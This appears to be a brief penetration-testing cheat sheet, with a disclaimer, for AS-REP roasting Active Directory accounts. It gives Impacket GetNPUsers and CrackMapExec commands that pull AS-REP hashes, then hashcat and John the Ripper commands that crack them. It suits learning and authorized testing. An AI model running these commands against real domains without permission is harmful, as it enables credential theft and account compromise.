Disclaimer: This material is provided for educational purposes and authorized security testing only. You are solely responsible for how you use the information. Do not use these techniques on systems without explicit permission from the owner. We do not encourage any kind of illegal or harmful activity

Using Impacket GetNPUsers.py

1. Update the package list:
   

   sudo apt-get update
   

2. Install Impacket:
   

   sudo apt-get install python3-impacket
   

3. Enumerate accounts:
   

   impacket-GetNPUsers -dc-ip [IP_ADDRESS] example.local/ -usersfile users.txt -no-pass -outputfile asrep_hashes.txt
   

4. Crack AS-REP hashes using Hashcat:
   

   hashcat -m 18200 -a 0 asrep_hashes.txt /usr/share/wordlists/rockyou.txt
   

5. Crack AS-REP hashes using John the Ripper:
   

   john --format=krb5asrep --wordlist=wordlist.txt asrep_hashes.txt
   

Using CrackMapExec

1. Enumerate accounts and retrieve AS-REP hashes:
   

   crackmapexec smb [IP_ADDRESS] -u users.txt --asreproast asrep_hashes.txt